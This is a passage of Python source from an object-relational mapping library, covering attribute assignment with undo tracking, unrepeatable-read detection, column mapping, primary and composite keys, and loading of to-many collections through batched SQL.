        if cache is None or not cache.is_alive: throw_db_session_is_over('assign new value to', obj, attr)
        if obj._status_ in del_statuses: throw_object_was_deleted(obj)
        reverse = attr.reverse
        new_val = attr.validate(new_val, obj, from_db=False)
        if attr.pk_offset is not None:
            # pk values are immutable; assigning the same value is a no-op
            pkval = obj._pkval_
            if pkval is None: pass
            elif obj._pk_is_composite_:
                if new_val == pkval[attr.pk_offset]: return
            elif new_val == pkval: return
            throw(TypeError, 'Cannot change value of primary key')
        with cache.flush_disabled():
            old_val = obj._vals_.get(attr, NOT_LOADED)
            if old_val is NOT_LOADED and reverse and not reverse.is_collection:
                old_val = attr.load(obj)
            status = obj._status_
            wbits = obj._wbits_
            bit = obj._bits_[attr]
            objects_to_save = cache.objects_to_save
            objects_to_save_needs_undo = False
            if wbits is not None and bit:
                obj._wbits_ = wbits | bit
                if status != 'modified':
                    assert status in ('loaded', 'inserted', 'updated')
                    assert obj._save_pos_ is None
                    obj._status_ = 'modified'
                    obj._save_pos_ = len(objects_to_save)
                    objects_to_save.append(obj)
                    objects_to_save_needs_undo = True
                cache.modified = True
            if not attr.reverse and not attr.is_part_of_unique_index:
                # plain attribute: no indexes or reverse side to keep in sync
                obj._vals_[attr] = new_val
                return
            is_reverse_call = undo_funcs is not None
            if not is_reverse_call: undo_funcs = []
            undo = []
            def undo_func():
                # revert status, write bits, value and index entries
                obj._status_ = status
                obj._wbits_ = wbits
                if objects_to_save_needs_undo:
                    assert objects_to_save
                    obj2 = objects_to_save.pop()
                    assert obj2 is obj and obj._save_pos_ == len(objects_to_save)
                    obj._save_pos_ = None
                if old_val is NOT_LOADED: obj._vals_.pop(attr)
                else: obj._vals_[attr] = old_val
                for cache_index, old_key, new_key in undo:
                    if new_key is not None: del cache_index[new_key]
                    if old_key is not None: cache_index[old_key] = obj
            undo_funcs.append(undo_func)
            if old_val == new_val: return
            try:
                if attr.is_unique:
                    cache.update_simple_index(obj, attr, old_val, new_val, undo)
                get_val = obj._vals_.get
                for attrs, i in attr.composite_keys:
                    vals = [ get_val(a) for a in attrs ] # In Python 2 var name leaks into the function scope!
                    prev_vals = tuple(vals)
                    vals[i] = new_val
                    new_vals = tuple(vals)
                    cache.update_composite_index(obj, attrs, prev_vals, new_vals, undo)
                obj._vals_[attr] = new_val
                if not reverse: pass
                elif not is_reverse_call: attr.update_reverse(obj, old_val, new_val, undo_funcs)
                elif old_val not in (None, NOT_LOADED):
                    # called from the reverse side: only unlink the old value
                    if not reverse.is_collection:
                        if new_val is not None:
                            if reverse.is_required: throw(ConstraintError,
                                'Cannot unlink %r from previous %s object, because %r attribute is required'
                                % (old_val, obj, reverse))
                        reverse.__set__(old_val, None, undo_funcs)
                    elif isinstance(reverse, Set):
                        reverse.reverse_remove((old_val,), obj, undo_funcs)
                    else: throw(NotImplementedError)
            except:
                if not is_reverse_call:
                    for undo_func in reversed(undo_funcs): undo_func()
                raise
    def db_set(attr, obj, new_dbval, is_reverse_call=False):
        """Record a value observed in the database for obj.attr, detecting
        unrepeatable reads and keeping indexes and the reverse side in sync."""
        cache = obj._session_cache_
        assert cache is not None and cache.is_alive
        assert obj._status_ not in created_or_deleted_statuses
        assert attr.pk_offset is None
        if new_dbval is NOT_LOADED: assert is_reverse_call
        old_dbval = obj._dbvals_.get(attr, NOT_LOADED)
        if old_dbval is not NOT_LOADED:
            if old_dbval == new_dbval or (
                    not attr.reverse and attr.converters[0].dbvals_equal(old_dbval, new_dbval)):
                return
        bit = obj._bits_except_volatile_[attr]
        if obj._rbits_ & bit:
            # the attribute was read in this transaction but changed in the db
            assert old_dbval is not NOT_LOADED
            msg = 'Value of %s for %s was updated outside of current transaction' % (attr, obj)
            if new_dbval is not NOT_LOADED:
                msg = '%s (was: %s, now: %s)' % (msg, old_dbval, new_dbval)
            elif isinstance(attr.reverse, Optional):
                assert old_dbval is not None
                msg = "Multiple %s objects linked with the same %s object. " \
                      "Maybe %s attribute should be Set instead of Optional" \
                      % (attr.entity.__name__, old_dbval, attr.reverse)
            throw(UnrepeatableReadError, msg)
        if new_dbval is NOT_LOADED: obj._dbvals_.pop(attr, None)
        else: obj._dbvals_[attr] = new_dbval
        wbit = bool(obj._wbits_ & bit)
        if not wbit:
            # attribute was not locally modified: mirror the db value into vals
            old_val = obj._vals_.get(attr, NOT_LOADED)
            assert old_val == old_dbval, (old_val, old_dbval)
            if attr.is_part_of_unique_index:
                if attr.is_unique: cache.db_update_simple_index(obj, attr, old_val, new_dbval)
                get_val = obj._vals_.get
                for attrs, i in attr.composite_keys:
                    vals = [ get_val(a) for a in attrs ] # In Python 2 var name leaks into the function scope!
                    old_vals = tuple(vals)
                    vals[i] = new_dbval
                    new_vals = tuple(vals)
                    cache.db_update_composite_index(obj, attrs, old_vals, new_vals)
            if new_dbval is NOT_LOADED:
                obj._vals_.pop(attr, None)
            elif attr.reverse:
                obj._vals_[attr] = new_dbval
            else:
                assert len(attr.converters) == 1
                obj._vals_[attr] = attr.converters[0].dbval2val(new_dbval, obj)
        reverse = attr.reverse
        if not reverse: pass
        elif not is_reverse_call: attr.db_update_reverse(obj, old_dbval, new_dbval)
        elif old_dbval not in (None, NOT_LOADED):
            if not reverse.is_collection:
                if new_dbval is not NOT_LOADED: reverse.db_set(old_dbval, NOT_LOADED, is_reverse_call=True)
            elif isinstance(reverse, Set):
                reverse.db_reverse_remove((old_dbval,), obj)
            else: throw(NotImplementedError)
    def update_reverse(attr, obj, old_val, new_val, undo_funcs):
        """Propagate an in-session value change to the reverse attribute,
        cascading deletes where configured."""
        reverse = attr.reverse
        if not reverse.is_collection:
            if old_val not in (None, NOT_LOADED):
                if attr.cascade_delete: old_val._delete_(undo_funcs)
                elif reverse.is_required: throw(ConstraintError,
                    'Cannot unlink %r from previous %s object, because %r attribute is required'
                    % (old_val, obj, reverse))
                else: reverse.__set__(old_val, None, undo_funcs)
            if new_val is not None: reverse.__set__(new_val, obj, undo_funcs)
        elif isinstance(reverse, Set):
            if old_val not in (None, NOT_LOADED): reverse.reverse_remove((old_val,), obj, undo_funcs)
            if new_val is not None: reverse.reverse_add((new_val,), obj, undo_funcs)
        else: throw(NotImplementedError)
    def db_update_reverse(attr, obj, old_dbval, new_dbval):
        """Propagate a database-observed value change to the reverse attribute."""
        reverse = attr.reverse
        if not reverse.is_collection:
            if old_dbval not in (None, NOT_LOADED): reverse.db_set(old_dbval, NOT_LOADED, True)
            if new_dbval is not None: reverse.db_set(new_dbval, obj, True)
        elif isinstance(reverse, Set):
            if old_dbval not in (None, NOT_LOADED): reverse.db_reverse_remove((old_dbval,), obj)
            if new_dbval is not None: reverse.db_reverse_add((new_dbval,), obj)
        else: throw(NotImplementedError)
    def __delete__(attr, obj):
        # attribute deletion (del obj.attr) is not supported
        throw(NotImplementedError)
    def get_raw_values(attr, val):
        """Return the tuple of raw column values that represent val."""
        reverse = attr.reverse
        if not reverse: return (val,)
        rentity = reverse.entity
        if val is None: return rentity._pk_nones_
        return val._get_raw_pkval_()
    def get_columns(attr):
        """Resolve (once) and return the list of column names for this attribute.

        For relationship attributes, only one side of a one-to-one gets columns;
        the tie is broken by required-ness, explicit columns, then entity name.
        """
        assert not attr.is_collection
        assert not isinstance(attr.py_type, basestring)
        if attr._columns_checked: return attr.columns
        provider = attr.entity._database_.provider
        reverse = attr.reverse
        if not reverse: # attr is not part of relationship
            if not attr.columns: attr.columns = provider.get_default_column_names(attr)
            elif len(attr.columns) > 1: throw(MappingError, "Too many columns were specified for %s" % attr)
            attr.col_paths = [ attr.name ]
            attr.converters = [ provider.get_converter_by_attr(attr) ]
        else:
            def generate_columns():
                # columns/converters mirror the reverse entity's primary key
                reverse_pk_columns = reverse.entity._get_pk_columns_()
                reverse_pk_col_paths = reverse.entity._pk_paths_
                if not attr.columns:
                    attr.columns = provider.get_default_column_names(attr, reverse_pk_columns)
                elif len(attr.columns) != len(reverse_pk_columns): throw(MappingError,
                    'Invalid number of columns specified for %s' % attr)
                attr.col_paths = [ '-'.join((attr.name, paths)) for paths in reverse_pk_col_paths ]
                attr.converters = []
                for a in reverse.entity._pk_attrs_:
                    attr.converters.extend(a.converters)
            if reverse.is_collection: # one-to-many:
                generate_columns()
            # one-to-one:
            elif attr.is_required:
                assert not reverse.is_required
                generate_columns()
            elif attr.columns: generate_columns()
            elif reverse.columns: pass
            elif reverse.is_required: pass
            elif attr.entity.__name__ > reverse.entity.__name__: pass
            else: generate_columns()
        attr._columns_checked = True
        if len(attr.columns) == 1: attr.column = attr.columns[0]
        else: attr.column = None
        return attr.columns
    @property
    def asc(attr):
        # ascending order marker: the attribute itself
        return attr
    @property
    def desc(attr):
        # descending order marker: wrap the attribute
        return DescWrapper(attr)
    def describe(attr):
        """Return a human-readable declaration string, e.g. "name = Required(str)"."""
        t = attr.py_type
        if isinstance(t, type): t = t.__name__
        options = []
        if attr.args: options.append(', '.join(imap(str, attr.args)))
        if attr.auto: options.append('auto=True')
        if not isinstance(attr, PrimaryKey) and attr.is_unique: options.append('unique=True')
        if attr.default is not None: options.append('default=%r' % attr.default)
        if not options: options = ''
        else: options = ', ' + ', '.join(options)
        result = "%s(%s%s)" % (attr.__class__.__name__, t, options)
        return "%s = %s" % (attr.name, result)
class Optional(Attribute):
    """Attribute whose value may be left unset."""
    __slots__ = []
class Required(Attribute):
    """Attribute that must always have a non-empty value."""
    __slots__ = []
    def validate(attr, val, obj=None, entity=None, from_db=False):
        # Reject None and empty string, unless the value can still be filled
        # later (auto / volatile / sql_default).  Values coming from the
        # database only produce a warning instead of an error.
        val = Attribute.validate(attr, val, obj, entity, from_db)
        if val == '' or (val is None and not (attr.auto or attr.is_volatile or attr.sql_default)):
            if not from_db:
                throw(ValueError, 'Attribute %s is required' % (
                    attr if obj is None or obj._status_ is None else '%r.%s' % (obj, attr.name)))
            else:
                warnings.warn('Database contains %s for required attribute %s'
                              % ('NULL' if val is None else 'empty string', attr),
                              DatabaseContainsIncorrectEmptyValue)
        return val
class Discriminator(Required):
    """Attribute that stores the concrete entity class for single-table inheritance."""
    __slots__ = [ 'code2cls' ]
    def __init__(attr, py_type, *args, **kwargs):
        Attribute.__init__(attr, py_type, *args, **kwargs)
        attr.code2cls = {}  # maps discriminator value -> entity subclass
    def _init_(attr, entity, name):
        # must be declared on the root of the inheritance hierarchy
        if entity._root_ is not entity: throw(ERDiagramError,
            'Discriminator attribute %s cannot be declared in subclass' % attr)
        Required._init_(attr, entity, name)
        entity._discriminator_attr_ = attr
    @staticmethod
    def create_default_attr(entity):
        # Implicitly add a 'classtype' discriminator column to an entity
        # hierarchy that did not declare one explicitly.
        if hasattr(entity, 'classtype'): throw(ERDiagramError,
            "Cannot create discriminator column for %s automatically "
            "because name 'classtype' is already in use" % entity.__name__)
        attr = Discriminator(str, column='classtype')
        attr.is_implicit = True
        attr._init_(entity, 'classtype')
        entity._attrs_.append(attr)
        entity._new_attrs_.append(attr)
        entity._adict_['classtype'] = attr
        entity.classtype = attr
        attr.process_entity_inheritance(entity)
    def process_entity_inheritance(attr, entity):
        # Determine, validate and register the discriminator value for entity.
        if '_discriminator_' not in entity.__dict__:
            entity._discriminator_ = entity.__name__
        discr_value = entity._discriminator_
        if discr_value is not None:
            try: entity._discriminator_ = discr_value = attr.validate(discr_value)
            except ValueError: throw(TypeError,
                "Incorrect discriminator value is set for %s attribute '%s' of '%s' type: %r"
                % (entity.__name__, attr.name, attr.py_type.__name__, discr_value))
        elif issubclass(attr.py_type, basestring):
            discr_value = entity._discriminator_ = entity.__name__
        else: throw(TypeError, "Discriminator value for entity %s "
            "with custom discriminator column '%s' of '%s' type is not set"
            % (entity.__name__, attr.name, attr.py_type.__name__))
        attr.code2cls[discr_value] = entity
    def validate(attr, val, obj=None, entity=None, from_db=False):
        # DEFAULT resolves to the entity's own discriminator value.
        if from_db: return val
        elif val is DEFAULT:
            assert entity is not None
            return entity._discriminator_
        return Attribute.validate(attr, val, obj, entity)
    def load(attr, obj):
        assert False  # pragma: no cover
    def __get__(attr, obj, cls=None):
        if obj is None: return attr
        return obj._discriminator_
    def __set__(attr, obj, new_val):
        # the discriminator is derived from the entity class, never assigned
        throw(TypeError, 'Cannot assign value to discriminator attribute')
    def db_set(attr, obj, new_dbval):
        assert False  # pragma: no cover
    def update_reverse(attr, obj, old_val, new_val, undo_funcs):
        assert False  # pragma: no cover
class Index(object):
    """Declarative description of a (possibly composite) index, unique key or primary key."""
    __slots__ = 'entity', 'attrs', 'is_pk', 'is_unique'
    def __init__(index, *attrs, **options):
        index.entity = None
        index.attrs = list(attrs)
        index.is_pk = options.pop('is_pk', False)
        index.is_unique = options.pop('is_unique', True)
        assert not options
    def _init_(index, entity):
        # Bind the index to its entity: resolve attribute names to Attribute
        # objects, then validate each attribute's suitability for this kind of
        # index (pk / unique key / plain index).
        index.entity = entity
        attrs = index.attrs
        for i, attr in enumerate(index.attrs):
            if isinstance(attr, basestring):
                try: attr = getattr(entity, attr)
                except AttributeError: throw(AttributeError,
                    'Entity %s does not have attribute %s' % (entity.__name__, attr))
                attrs[i] = attr
        index.attrs = attrs = tuple(attrs)
        for i, attr in enumerate(attrs):
            if not isinstance(attr, Attribute):
                func_name = 'PrimaryKey' if index.is_pk else 'composite_key' if index.is_unique else 'composite_index'
                throw(TypeError, '%s() arguments must be attributes. Got: %r' % (func_name, attr))
            if index.is_unique:
                attr.is_part_of_unique_index = True
                if len(attrs) > 1: attr.composite_keys.append((attrs, i))
            if not issubclass(entity, attr.entity): throw(ERDiagramError,
                'Invalid use of attribute %s in entity %s' % (attr, entity.__name__))
            key_type = 'primary key' if index.is_pk else 'unique index' if index.is_unique else 'index'
            if attr.is_collection or (index.is_pk and not attr.is_required and not attr.auto):
                throw(TypeError, '%s attribute %s cannot be part of %s' % (attr.__class__.__name__, attr, key_type))
            if isinstance(attr.py_type, type) and issubclass(attr.py_type, float):
                throw(TypeError, 'Attribute %s of type float cannot be part of %s' % (attr, key_type))
            if index.is_pk and attr.is_volatile:
                throw(TypeError, 'Volatile attribute %s cannot be part of primary key' % attr)
            if not attr.is_required:
                if attr.nullable is False:
                    throw(TypeError, 'Optional attribute %s must be nullable, because it is part of composite key' % attr)
                attr.nullable = True
                # optional strings normally default to '' - inside a key this
                # would break uniqueness, so fall back to None
                if attr.is_string and attr.default == '' and not hasattr(attr, 'original_default'):
                    attr.default = None
def _define_index(func_name, attrs, is_unique=False):
    # Shared implementation of composite_index()/composite_key().  Uses frame
    # introspection to append an Index into the entity class body currently
    # being defined (depth 2: this helper -> public wrapper -> class body).
    if len(attrs) < 2: throw(TypeError,
        '%s() must receive at least two attributes as arguments' % func_name)
    cls_dict = sys._getframe(2).f_locals
    indexes = cls_dict.setdefault('_indexes_', [])
    indexes.append(Index(*attrs, is_pk=False, is_unique=is_unique))
def composite_index(*attrs):
    """Declare a non-unique composite index on two or more attributes."""
    _define_index('composite_index', attrs)
def composite_key(*attrs):
    """Declare a unique composite key on two or more attributes."""
    _define_index('composite_key', attrs, is_unique=True)
class PrimaryKey(Required):
    """Primary-key attribute, or declaration of a composite primary key.

    Two usages inside an entity class body:
      attr = PrimaryKey(int, ...)        -> creates a required pk attribute
      PrimaryKey(attr1, attr2, ...)      -> registers a composite primary key
                                            and returns None (nothing is bound)
    """
    __slots__ = []
    def __new__(cls, *args, **kwargs):
        if not args: throw(TypeError, 'PrimaryKey must receive at least one positional argument')
        # namespace of the entity class body currently being defined
        # (fix: was assigned twice; the duplicate assignment is removed)
        cls_dict = sys._getframe(1).f_locals
        attrs = tuple(a for a in args if isinstance(a, Attribute))
        non_attrs = [ a for a in args if not isinstance(a, Attribute) ]
        if not attrs:
            # normal attribute declaration: PrimaryKey(int, auto=True) etc.
            return Required.__new__(cls)
        elif non_attrs or kwargs:
            throw(TypeError, 'PrimaryKey got invalid arguments: %r %r' % (args, kwargs))
        elif len(attrs) == 1:
            # PrimaryKey(attr) on a single attribute is a usage error - explain
            # the intended declaration style in the message
            attr = attrs[0]
            attr_name = 'something'
            for key, val in iteritems(cls_dict):
                if val is attr: attr_name = key; break
            py_type = attr.py_type
            type_str = py_type.__name__ if type(py_type) is type else repr(py_type)
            throw(TypeError, 'Just use %s = PrimaryKey(%s, ...) directly instead of PrimaryKey(%s)'
                             % (attr_name, type_str, attr_name))
        # composite pk: mark every attribute and register the pk Index
        for i, attr in enumerate(attrs):
            attr.is_part_of_unique_index = True
            attr.composite_keys.append((attrs, i))
        indexes = cls_dict.setdefault('_indexes_', [])
        indexes.append(Index(*attrs, is_pk=True))
        return None
class Collection(Attribute):
    """Abstract base for to-many relationship attributes (concrete: Set).

    Adds collection-specific options on top of Attribute: the m2m link
    table name, reverse column names (for symmetric relations), the
    N+1-query prefetch threshold, and per-attribute caches for generated
    SQL statements.
    """
    __slots__ = 'table', 'wrapper_class', 'symmetric', 'reverse_column', 'reverse_columns', \
                'nplus1_threshold', 'cached_load_sql', 'cached_add_m2m_sql', 'cached_remove_m2m_sql', \
                'cached_count_sql', 'cached_empty_sql', 'reverse_fk_name'
    def __init__(attr, py_type, *args, **kwargs):
        # Validates and stores collection options; 'table' is popped before
        # Attribute.__init__, the remaining options are taken from attr.kwargs
        # afterwards (Attribute.__init__ stashes unconsumed kwargs there).
        if attr.__class__ is Collection: throw(TypeError, "'Collection' is abstract type")
        table = kwargs.pop('table', None) # TODO: rename table to link_table or m2m_table
        if table is not None and not isinstance(table, basestring):
            # Composite table name (e.g. schema-qualified) given as a sequence
            if not isinstance(table, (list, tuple)):
                throw(TypeError, "Parameter 'table' must be a string. Got: %r" % table)
            for name_part in table:
                if not isinstance(name_part, basestring):
                    throw(TypeError, 'Each part of table name must be a string. Got: %r' % name_part)
            table = tuple(table)
        attr.table = table
        Attribute.__init__(attr, py_type, *args, **kwargs)
        if attr.auto: throw(TypeError, "'auto' option could not be set for collection attribute")
        kwargs = attr.kwargs
        # reverse_column / reverse_columns are mutually exclusive spellings of
        # the same option; normalize so both attr.reverse_column and
        # attr.reverse_columns end up consistent.
        attr.reverse_column = kwargs.pop('reverse_column', None)
        attr.reverse_columns = kwargs.pop('reverse_columns', None)
        if attr.reverse_column is not None:
            if attr.reverse_columns is not None and attr.reverse_columns != [ attr.reverse_column ]:
                throw(TypeError, "Parameters 'reverse_column' and 'reverse_columns' cannot be specified simultaneously")
            if not isinstance(attr.reverse_column, basestring):
                throw(TypeError, "Parameter 'reverse_column' must be a string. Got: %r" % attr.reverse_column)
            attr.reverse_columns = [ attr.reverse_column ]
        elif attr.reverse_columns is not None:
            if not isinstance(attr.reverse_columns, (tuple, list)):
                throw(TypeError, "Parameter 'reverse_columns' must be a list. Got: %r" % attr.reverse_columns)
            for reverse_column in attr.reverse_columns:
                if not isinstance(reverse_column, basestring):
                    throw(TypeError, "Parameter 'reverse_columns' must be a list of strings. Got: %r" % attr.reverse_columns)
            if len(attr.reverse_columns) == 1: attr.reverse_column = attr.reverse_columns[0]
        else: attr.reverse_columns = []
        attr.reverse_fk_name = kwargs.pop('reverse_fk_name', None)
        # How many one-by-one loads are tolerated before switching to batch
        # prefetching of this collection for sibling objects.
        attr.nplus1_threshold = kwargs.pop('nplus1_threshold', 1)
        # Per-attribute caches of generated SQL (filled lazily).
        attr.cached_load_sql = {}
        attr.cached_add_m2m_sql = None
        attr.cached_remove_m2m_sql = None
        attr.cached_count_sql = None
        attr.cached_empty_sql = None
    def _init_(attr, entity, name):
        # Second-phase initialization, once the owning entity class is known.
        Attribute._init_(attr, entity, name)
        if attr.is_unique: throw(TypeError,
            "'unique' option cannot be set for attribute %s because it is collection" % attr)
        if attr.default is not None:
            throw(TypeError, 'Default value could not be set for collection attribute')
        # Symmetric relation: the attribute is its own reverse (same entity, same name).
        attr.symmetric = (attr.py_type == entity.__name__ and attr.reverse == name)
        if not attr.symmetric and attr.reverse_columns: throw(TypeError,
            "'reverse_column' and 'reverse_columns' options can be set for symmetric relations only")
        if attr.py_check is not None:
            throw(NotImplementedError, "'py_check' parameter is not supported for collection attributes")
    # Interface implemented by concrete collection classes (see Set below).
    def load(attr, obj):
        assert False, 'Abstract method'  # pragma: no cover
    def __get__(attr, obj, cls=None):
        assert False, 'Abstract method'  # pragma: no cover
    def __set__(attr, obj, val):
        assert False, 'Abstract method'  # pragma: no cover
    def __delete__(attr, obj):
        assert False, 'Abstract method'  # pragma: no cover
    def prepare(attr, obj, val, fromdb=False):
        assert False, 'Abstract method'  # pragma: no cover
    def set(attr, obj, val, fromdb=False):
        assert False, 'Abstract method'  # pragma: no cover
class SetData(set):
    """In-memory state of one collection attribute for one object.

    The set itself holds the items known to be in the collection; the
    extra slots track load status and pending/negative information:
    added/removed (pending changes to flush), absent (items known NOT to
    be in the collection), and count (cached size, if known).
    """
    __slots__ = 'is_fully_loaded', 'added', 'removed', 'absent', 'count'
    def __init__(setdata):
        setdata.is_fully_loaded = False
        setdata.added = None
        setdata.removed = None
        setdata.absent = None
        setdata.count = None
def construct_batchload_criteria_list(alias, columns, converters, batch_size, row_value_syntax, start=0, from_seeds=True):
    """Build a list of SQL AST conditions matching `batch_size` rows.

    Produces WHERE-clause fragments for table `alias` over `columns`,
    choosing between simple equality, an IN-list, row-value IN syntax, or
    an OR of per-row AND conditions, depending on batch size, column
    count, and provider support for row values.
    """
    assert batch_size > 0
    def make_param(i, j, converter):
        # Seed parameters are keyed (i, None, j); object parameters (i, j, None).
        key = (i, None, j) if from_seeds else (i, j, None)
        return [ 'PARAM', key, converter ]
    if batch_size == 1:
        return [ [ conv.EQ, [ 'COLUMN', alias, col ], make_param(start, j, conv) ]
                 for j, (col, conv) in enumerate(izip(columns, converters)) ]
    if len(columns) == 1:
        col, conv = columns[0], converters[0]
        params = [ make_param(start + i, 0, conv) for i in xrange(batch_size) ]
        return [ [ 'IN', [ 'COLUMN', alias, col ], params ] ]
    if row_value_syntax:
        row_ast = [ 'ROW' ] + [ [ 'COLUMN', alias, col ] for col in columns ]
        params = [ [ 'ROW' ] + [ make_param(start + i, j, conv) for j, conv in enumerate(converters) ]
                   for i in xrange(batch_size) ]
        return [ [ 'IN', row_ast, params ] ]
    # Fallback for providers without row-value syntax: OR of ANDed equalities.
    disjuncts = [ [ 'AND' ] + [ [ conv.EQ, [ 'COLUMN', alias, col ], make_param(start + i, j, conv) ]
                                for j, (col, conv) in enumerate(izip(columns, converters)) ]
                  for i in xrange(batch_size) ]
    return [ [ 'OR' ] + disjuncts ]
class Set(Collection):
    """To-many collection attribute.

    Per-object state lives in ``obj._vals_[attr]`` as a SetData instance,
    which tracks loaded items plus added/removed/absent bookkeeping used
    for flushing changes and caching negative membership tests.
    """
    __slots__ = []
    def validate(attr, val, obj=None, entity=None, from_db=False):
        """Normalize `val` into a set of reverse-entity instances.

        Accepts a single instance or an iterable of them; checks item
        types and that every item belongs to the same session cache.
        """
        assert val is not NOT_LOADED
        if val is DEFAULT: return set()
        reverse = attr.reverse
        if val is None: throw(ValueError, 'A single %(cls)s instance or %(cls)s iterable is expected. '
                                          'Got: None' % dict(cls=reverse.entity.__name__))
        if entity is not None: pass
        elif obj is not None: entity = obj.__class__
        else: entity = attr.entity
        if not reverse: throw(NotImplementedError)
        if isinstance(val, reverse.entity): items = set((val,))
        else:
            rentity = reverse.entity
            try: items = set(val)
            except TypeError: throw(TypeError, 'Item of collection %s.%s must be an instance of %s. Got: %r'
                                               % (entity.__name__, attr.name, rentity.__name__, val))
            for item in items:
                if not isinstance(item, rentity):
                    throw(TypeError, 'Item of collection %s.%s must be an instance of %s. Got: %r'
                                     % (entity.__name__, attr.name, rentity.__name__, item))
        if obj is not None and obj._status_ is not None: cache = obj._session_cache_
        else: cache = entity._database_._get_cache()
        for item in items:
            if item._session_cache_ is not cache:
                throw(TransactionError, 'An attempt to mix objects belonging to different transactions')
        return items
    def load(attr, obj, items=None):
        """Load collection content from the database.

        With `items`, only resolves membership of those specific items
        (partial load); otherwise fully loads the collection, and may
        batch-prefetch the same collection for sibling objects when
        statistics indicate an N+1 query pattern.
        """
        cache = obj._session_cache_
        if cache is None or not cache.is_alive: throw_db_session_is_over('load collection', obj, attr)
        assert obj._status_ not in del_statuses
        setdata = obj._vals_.get(attr)
        if setdata is None: setdata = obj._vals_[attr] = SetData()
        elif setdata.is_fully_loaded: return setdata
        entity = attr.entity
        reverse = attr.reverse
        rentity = reverse.entity
        if not reverse: throw(NotImplementedError)
        database = obj._database_
        if cache is not database._get_cache():
            # Fix: the %s placeholder was never formatted in the original message.
            throw(TransactionError, "Transaction of object %s belongs to different thread" % safe_repr(obj))
        if items:
            # Drop items whose membership is already known.
            if not reverse.is_collection:
                items = {item for item in items if reverse not in item._vals_}
            else:
                items = set(items)
                items -= setdata
                if setdata.removed: items -= setdata.removed
            if not items: return setdata
        if items and (attr.lazy or not setdata):
            # Targeted membership query instead of a full collection load.
            items = list(items)
            if not reverse.is_collection:
                sql, adapter, attr_offsets = rentity._construct_batchload_sql_(len(items))
                arguments = adapter(items)
                cursor = database._exec_sql(sql, arguments)
                items = rentity._fetch_objects(cursor, attr_offsets)
                return setdata
            sql, adapter = attr.construct_sql_m2m(1, len(items))
            items.append(obj)
            arguments = adapter(items)
            cursor = database._exec_sql(sql, arguments)
            loaded_items = {rentity._get_by_raw_pkval_(row) for row in cursor.fetchall()}
            setdata |= loaded_items
            reverse.db_reverse_add(loaded_items, obj)
            return setdata
        counter = cache.collection_statistics.setdefault(attr, 0)
        nplus1_threshold = attr.nplus1_threshold
        prefetching = options.PREFETCHING and not attr.lazy and nplus1_threshold is not None \
                      and (counter >= nplus1_threshold or cache.noflush_counter)
        objects = [ obj ]
        setdata_list = [ setdata ]
        if prefetching:
            # Also load this collection for other cached objects of the same
            # entity, limited by how many parameters the provider allows.
            pk_index = cache.indexes[entity._pk_attrs_]
            max_batch_size = database.provider.max_params_count // len(entity._pk_columns_)
            for obj2 in itervalues(pk_index):
                if obj2 is obj: continue
                if obj2._status_ in created_or_deleted_statuses: continue
                setdata2 = obj2._vals_.get(attr)
                if setdata2 is None: setdata2 = obj2._vals_[attr] = SetData()
                elif setdata2.is_fully_loaded: continue
                objects.append(obj2)
                setdata_list.append(setdata2)
                if len(objects) >= max_batch_size: break
        if not reverse.is_collection:
            sql, adapter, attr_offsets = rentity._construct_batchload_sql_(len(objects), reverse)
            arguments = adapter(objects)
            cursor = database._exec_sql(sql, arguments)
            items = rentity._fetch_objects(cursor, attr_offsets)
        else:
            sql, adapter = attr.construct_sql_m2m(len(objects))
            arguments = adapter(objects)
            cursor = database._exec_sql(sql, arguments)
            pk_len = len(entity._pk_columns_)
            d = {}
            if len(objects) > 1:
                # Group fetched m2m rows by owner object.
                for row in cursor.fetchall():
                    obj2 = entity._get_by_raw_pkval_(row[:pk_len])
                    item = rentity._get_by_raw_pkval_(row[pk_len:])
                    items = d.get(obj2)
                    if items is None: items = d[obj2] = set()
                    items.add(item)
            else: d[obj] = {rentity._get_by_raw_pkval_(row) for row in cursor.fetchall()}
            for obj2, items in iteritems(d):
                setdata2 = obj2._vals_.get(attr)
                # Fix: store the fresh SetData on obj2 (the original stored it
                # on obj, clobbering the setdata being loaded for obj itself).
                if setdata2 is None: setdata2 = obj2._vals_[attr] = SetData()
                else:
                    # Items previously seen but missing from this load indicate
                    # a non-repeatable read.
                    phantoms = setdata2 - items
                    if setdata2.added: phantoms -= setdata2.added
                    if phantoms: throw(UnrepeatableReadError,
                        'Phantom object %s disappeared from collection %s.%s'
                        % (safe_repr(phantoms.pop()), safe_repr(obj2), attr.name))
                items -= setdata2
                if setdata2.removed: items -= setdata2.removed
                setdata2 |= items
                reverse.db_reverse_add(items, obj2)
        for setdata2 in setdata_list:
            setdata2.is_fully_loaded = True
            setdata2.absent = None
            setdata2.count = len(setdata2)
        cache.collection_statistics[attr] = counter + 1
        return setdata
    def construct_sql_m2m(attr, batch_size=1, items_count=0):
        """Build (and cache) the SELECT over the m2m link table.

        batch_size > 1 loads the collection for several owner objects at
        once; items_count > 0 restricts the query to specific items
        (membership check) and implies batch_size == 1.
        """
        if items_count:
            assert batch_size == 1
            cache_key = -items_count  # negative keys mark membership queries
        else: cache_key = batch_size
        cached_sql = attr.cached_load_sql.get(cache_key)
        if cached_sql is not None: return cached_sql
        reverse = attr.reverse
        assert reverse is not None and reverse.is_collection and issubclass(reverse.py_type, Entity)
        table_name = attr.table
        assert table_name is not None
        select_list = [ 'ALL' ]
        if not attr.symmetric:
            columns = attr.columns
            converters = attr.converters
            rcolumns = reverse.columns
            rconverters = reverse.converters
        else:
            # Symmetric relation: both sides live in the same link table.
            columns = attr.reverse_columns
            rcolumns = attr.columns
            converters = rconverters = attr.converters
        if batch_size > 1:
            # Owner pk columns are needed to group rows per object.
            select_list.extend([ 'COLUMN', 'T1', column ] for column in rcolumns)
        select_list.extend([ 'COLUMN', 'T1', column ] for column in columns)
        from_list = [ 'FROM', [ 'T1', 'TABLE', table_name ]]
        database = attr.entity._database_
        row_value_syntax = database.provider.translator_cls.row_value_syntax
        where_list = [ 'WHERE' ]
        where_list += construct_batchload_criteria_list(
            'T1', rcolumns, rconverters, batch_size, row_value_syntax, items_count)
        if items_count:
            where_list += construct_batchload_criteria_list(
                'T1', columns, converters, items_count, row_value_syntax)
        sql_ast = [ 'SELECT', select_list, from_list, where_list ]
        sql, adapter = attr.cached_load_sql[cache_key] = database._ast2sql(sql_ast)
        return sql, adapter
    def copy(attr, obj):
        """Return the fully loaded collection content as a plain set."""
        if obj._status_ in del_statuses: throw_object_was_deleted(obj)
        if obj._vals_ is None: throw_db_session_is_over('read value of', obj, attr)
        setdata = obj._vals_.get(attr)
        if setdata is None or not setdata.is_fully_loaded: setdata = attr.load(obj)
        reverse = attr.reverse
        if not reverse.is_collection and reverse.pk_offset is None:
